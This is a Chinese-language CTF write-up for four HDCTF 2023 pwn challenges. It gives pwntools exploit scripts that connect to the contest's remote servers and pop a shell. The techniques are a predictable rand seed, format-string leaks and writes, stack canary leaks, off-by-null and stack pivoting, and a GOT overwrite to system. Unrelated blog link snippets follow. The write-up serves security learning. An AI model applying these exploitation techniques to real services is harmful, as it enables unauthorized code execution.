HDCTF_2023
pwnner
有后门函数,seed是一个固定值,
//伪随机数
#include <stdio.h>
#include <stdlib.h>
int main()
{
int b;
srand(0x39);
for (size_t i = 0; i <1; i++)
{
b = rand() ;
printf("%d ", b); #1956681178
}
return 0;
}
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28067)
p.sendafter("name:\n",'1956681178')
payload = 'a'*0x48 +p64(0x4008B3)
p.sendlineafter("next?\n",payload)
p.interactive()
KEEP ON
附件 普通的栈迁移,用格式字符串漏洞泄露old_rbp ,
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p=remote('node4.anna.nssctf.cn',28609)
p.sendafter(": \n",'%16$p')
p.recvuntil('0x')
rbp = int(p.recv(12),16)
print(hex(rbp))
payload ="aaaaaaaa" +p64(0x4008d3)+p64(rbp-0x60+0x20)+p64(0x4005e0)+'/bin/sh\x00'
payload = payload.ljust(0x50,'a') +p64(rbp-0x10-0x50)+p64(0x4007f2)
p.recvuntil("keep on !\n")
p.send(payload)
p.interactive()
Makewish
附件 没有种子函数,默认为0,用gdb调试或用第一题的伪随机数脚本可以得到随机数,
用puts泄露canary,off by null 漏洞,覆盖rbp最后一字节为\x00,实现栈迁移
即使exp是真确的,也不能保证百分百一次性打通,
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node4.anna.nssctf.cn',28727)
system = 0x4007Cb
ret = 0x4005d9
p.sendafter("name\n\n",b'a'*0x29)
p.recvuntil('a'*0x29)
canary = u64(p.recv(7).rjust(8,'\x00'))
print(hex(canary))
p.sendafter("key\n\n",p32(0x000002c3)) #由于read只能读四个字节,不能用sendline,
payload = p64(ret)*10 +p64(system)+p64(canary)
p.sendafter("welcome to HDctf,You can make a wish to me\n",payload)
p.interactive()
Minions
附件 计算偏移,用%d$n (d:表示十进制数) 往key写数据,或者用fmtstr_payload{偏移,{key:数据}}
这道题用栈迁移迁到0x6010C0,是不可行的,因为0x6010C0离非rw段太近了
0x600000 0x601000 r--p 1000 #非rw段
0x601000 0x602000 rw-p 1000
我将介绍两种方法解决这道题目
方法一
栈循环一次,栈迁移到更高的地方
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28190)
#p = process('./4')
elf = ELF('./4')
def d():
gdb.attach(p)
pause()
bss = elf.bss(0xe00)
rdi = 0x400893
leave_ret = 0x400758
key = 0x6010A0
again = 0x4007DE
system = 0x4005c0
binsh = 0x6010C8
payload = '%102c%8$n'+'a'*7 +p64(key)
p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)
payload = 'a'*0x30 +p64(bss+0x30)+p64(again)
p.sendafter("welcome,tell me more about you\n",payload)
p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
payload = p64(rdi)+p64(binsh)+p64(system)
payload = payload.ljust(0x30,'\x00')+p64(bss-8)+p64(leave_ret)
p.sendafter("welcome,tell me more about you\n",payload)
p.sendlineafter("That's great.Do you like Minions?\n",'/bin/sh\x00'*5)
p.interactive()
方法二
栈循环两次,将printf_got修改为system
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
p = remote('node1.anna.nssctf.cn',28627)
elf = ELF('./4')
key = 0x6010A0
main =0x4007Ae
system = 0x4005c0
payload = '%102c%8$n'+'a'*7 +p64(key)
p.sendlineafter("Welcome to HDCTF.What you name?\n\n",payload)
payload2 = 'a'*0x38+p64(main)
p.sendafter("welcome,tell me more about you\n",payload2)
p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
payload = fmtstr_payload(6,{elf.got['printf']:system})
p.sendafter("Welcome to HDCTF.What you name?\n\n",payload)
p.sendafter("welcome,tell me more about you\n",payload2)
p.sendafter("That's great.Do you like Minions?\n",'/bin/sh\x00')
p.sendafter("Welcome to HDCTF.What you name?\n\n",'/bin/sh\x00')
p.interactive()
HDCTF_2023的更多相关文章
随机推荐
- Ansys-CHEMKIN-pro表面反应机制输入(Surface Kinetics Input)规则
chemkin表面反应机制文件(Ansys-CHEMKIN-pro表面反应机制输入) 1. 文件包含表面活性位(相).表面组分,固相组分.固相,热力学数据,反应机制: 2. 顺序:物质名称,活性位数据 ...
- hi,docker,docker的介绍
一.docker的介绍 1.什么是docker: docker是一种虚拟化技术,小型的系统环境(linux)2.虚拟化技术: 在计算机中用例管理虚拟资源的一种手段 内存管理.软件虚拟化.硬件虚拟化(磁 ...
- ORACLE数据库通过DBLINK连接另一个数据库
ORACLE数据库通过DBLINK连接另一个数据库 亲测有效:create database link XXX --dblink名connect to 远程数据库用户名 identified by & ...
- 中文数据导入到hive,出现乱码
中文数据导入到hive,出现乱码 解决方法: 右键要导入的数据文件,选择用Notepad++打开,然后点击"编辑"-->转为UTF-8,最后保存即可. 然后在上传到指定路径下 ...
- Python学习笔记W1
今天正式开始学习Python语言,学习方式观看教学视频,完成作业.视频共计28周,争取每天2天完成一周教学内容,共计56天,预计完成日期:2019-2-28. Owen写于2018-12-22 ...
- mysql 存储国过程实现竖表变横表(将行数据值变为字段)
示例: 表结构如下: CREATE TABLE `pressure` ( `id` int(11) NOT NULL AUTO_INCREMENT COMMENT '自增主键', `presurena ...
- leetcode medium 记录 1-50
# Title Solution 二刷 Difficulty 备注 2 Add Two Numbers X Medium 3 Longest Substring Wi ...
- 网络安全(中职组)-B模块:服务远程控制
任务四:服务远程控制任务环境说明:服务器场景名:20200609(关闭链接)服务器场景操作系统:未知服务器场景用户名:root服务器场景密码:Admin123 1. 通过本地PC中渗透测试平台K ...
- Java笔记第三弹
Map集合的获取功能 V get(Object key);//根据键获取值 Set<K> keySet();//获取所有键的集合 Collection<K> values(); ...
- MySQL Mock大量数据做查询响应测试
上个迭代版本发布后,生产环境业务同事反馈仓配订单查询的页面加载时间过长. 因为页面原来是有的,这次开发是在原来基础上改的,因此没有额外做性能.测试环境只调用接口请求了少量数据去验证功能.在对比该迭代添 ...